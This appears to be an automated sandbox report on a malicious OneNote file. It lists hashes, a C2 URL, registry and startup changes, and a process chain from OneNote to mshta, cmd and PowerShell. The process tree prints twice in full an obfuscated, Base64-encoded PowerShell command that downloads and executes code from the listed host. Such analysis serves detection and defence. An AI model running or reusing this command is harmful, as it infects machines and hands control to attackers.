Analysis
-
max time kernel
150s -
max time network
82s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
02/02/2023, 21:10
Static task
static1
Behavioral task
behavioral1
Sample
12c4d9eddce807d10e3578fcf2918366def586ec374a35957880a65dbd467efc.one
Resource
win7-20221111-en
General
-
Target
12c4d9eddce807d10e3578fcf2918366def586ec374a35957880a65dbd467efc.one
-
Size
264KB
-
MD5
3431b5db65041c5c495deaf3a6c74006
-
SHA1
7a5ce0bf1d336f8d7b0a41d4e71327549f827c71
-
SHA256
12c4d9eddce807d10e3578fcf2918366def586ec374a35957880a65dbd467efc
-
SHA512
645db443ae98c50b4d336a26b684eb93eb4e6934df3adc82eec2bd1d502ea3c1bd89230e82fc83f6f20b33da96343926994e7f3af7df9406c76b1387989978f4
-
SSDEEP
3072:raA0YRw9/WITtTWR7IbNzvL1aaIuWt4AJERnyNenUWHCoTCCCCCCCCCCCCCCCCCv:ba9xytedL1dy4iERBBf3yBLTlz
Malware Config
Extracted
http://restlomik.com/gatef.php
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 10 308 powershell.exe 11 1800 powershell.exe -
Deletes itself 1 IoCs
pid Process 908 ONENOTE.EXE -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk ONENOTE.EXE -
Drops file in Program Files directory 5 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\ACADEMIC.ONE ONENOTE.EXE File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\BLANK.ONE ONENOTE.EXE File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\BUSINESS.ONE ONENOTE.EXE File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\DESIGNER.ONE ONENOTE.EXE File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\PLANNERS.ONE ONENOTE.EXE -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log ONENOTE.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar ONENOTE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" ONENOTE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" ONENOTE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" ONENOTE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" ONENOTE.EXE Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt ONENOTE.EXE Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote ONENOTE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" ONENOTE.EXE Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel ONENOTE.EXE Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F2A7EE29-8BF6-4A6D-83F1-098E366C709C}\1.0\ = "Microsoft OneNote 12.0 Object Library" ONENOTE.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F2A7EE29-8BF6-4A6D-83F1-098E366C709C}\1.0\0\win32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONENOTE.EXE\\2" ONENOTE.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.0\ = "Microsoft OneNote 14.0 Object Library" ONENOTE.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.0\0\win32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONENOTE.EXE\\3" ONENOTE.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" ONENOTE.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" ONENOTE.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 908 ONENOTE.EXE 908 ONENOTE.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 308 powershell.exe 1800 powershell.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 908 ONENOTE.EXE -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: 33 1572 ONENOTEM.EXE Token: SeIncBasePriorityPrivilege 1572 ONENOTEM.EXE Token: SeDebugPrivilege 308 powershell.exe Token: SeDebugPrivilege 1800 powershell.exe Token: 33 908 ONENOTE.EXE Token: SeIncBasePriorityPrivilege 908 ONENOTE.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1572 ONENOTEM.EXE -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1572 ONENOTEM.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 908 ONENOTE.EXE 908 ONENOTE.EXE 908 ONENOTE.EXE 908 ONENOTE.EXE 908 ONENOTE.EXE 908 ONENOTE.EXE 908 ONENOTE.EXE 908 ONENOTE.EXE 908 ONENOTE.EXE 908 ONENOTE.EXE 908 ONENOTE.EXE 908 ONENOTE.EXE 908 ONENOTE.EXE 908 ONENOTE.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 908 wrote to memory of 1572 908 ONENOTE.EXE 31 PID 908 wrote to memory of 1572 908 ONENOTE.EXE 31 PID 908 wrote to memory of 1572 908 ONENOTE.EXE 31 PID 908 wrote to memory of 1572 908 ONENOTE.EXE 31 PID 908 wrote to memory of 1684 908 ONENOTE.EXE 33 PID 908 wrote to memory of 1684 908 ONENOTE.EXE 33 PID 908 wrote to memory of 1684 908 ONENOTE.EXE 33 PID 908 wrote to memory of 1684 908 ONENOTE.EXE 33 PID 1684 wrote to memory of 1916 1684 mshta.exe 34 PID 1684 wrote to memory of 1916 1684 mshta.exe 34 PID 1684 wrote to memory of 1916 1684 mshta.exe 34 PID 1684 wrote to memory of 1916 1684 mshta.exe 34 PID 1916 wrote to memory of 308 1916 cmd.exe 36 PID 1916 wrote to memory of 308 1916 cmd.exe 36 PID 1916 wrote to memory of 308 1916 cmd.exe 36 PID 1916 wrote to memory of 308 1916 cmd.exe 36 PID 908 wrote to memory of 572 908 ONENOTE.EXE 37 PID 908 wrote to memory of 572 908 ONENOTE.EXE 37 PID 908 wrote to memory of 572 908 ONENOTE.EXE 37 PID 908 wrote to memory of 572 908 ONENOTE.EXE 37 PID 572 wrote to memory of 1076 572 mshta.exe 38 PID 572 wrote to memory of 1076 572 mshta.exe 38 PID 572 wrote to memory of 1076 572 mshta.exe 38 PID 572 wrote to memory of 1076 572 mshta.exe 38 PID 1076 wrote to memory of 1800 1076 cmd.exe 40 PID 1076 wrote to memory of 1800 1076 cmd.exe 40 PID 1076 wrote to memory of 1800 1076 cmd.exe 40 PID 1076 wrote to memory of 1800 1076 cmd.exe 40
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE"C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE" "C:\Users\Admin\AppData\Local\Temp\12c4d9eddce807d10e3578fcf2918366def586ec374a35957880a65dbd467efc.one"1⤵
- Deletes itself
- Drops startup file
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE/tsr2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1572
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\Open.hta"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBlAHMAdABsAG8AbQBpAGsALgBjAG8AbQAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=3⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBlAHMAdABsAG8AbQBpAGsALgBjAG8AbQAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:308
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\1\Open.hta"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBlAHMAdABsAG8AbQBpAGsALgBjAG8AbQAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=3⤵
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBlAHMAdABsAG8AbQBpAGsALgBjAG8AbQAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1800
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD51227434bf06a35a7b25b95fd141510d0
SHA14047c8e1cefe81f16fdc519d020e3b3a47d686e8
SHA256915eca47e23e62c007898c6c29fbe8e503bd31b1387f23804c9a2babfbee62c5
SHA512ce0236c7898a7216158c4a980748492a824846fd58868dfc83cbe56f1f1dd8203f6ec823ec7e318265be2305fa5c401e175c1a1452586147496c8e0a35cb804d
-
Filesize
23KB
MD51227434bf06a35a7b25b95fd141510d0
SHA14047c8e1cefe81f16fdc519d020e3b3a47d686e8
SHA256915eca47e23e62c007898c6c29fbe8e503bd31b1387f23804c9a2babfbee62c5
SHA512ce0236c7898a7216158c4a980748492a824846fd58868dfc83cbe56f1f1dd8203f6ec823ec7e318265be2305fa5c401e175c1a1452586147496c8e0a35cb804d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD54dadf2509816b83be10726d128bed098
SHA1ba570a8dcfcb848fda968d762b881952c53b8d90
SHA25693f8e6e8993462920ce68651c1a21472c45a6f09c841e56deb1a6c6eadc6eb0d
SHA51200c828e40e4546a7d2b28d2addb62dfe833d70f5ea7eb9b6a0441876c7e2754d0b4ebfdde0ac71e102d1c58969d3348e83ed0430ae9298038aaacc1e162429b6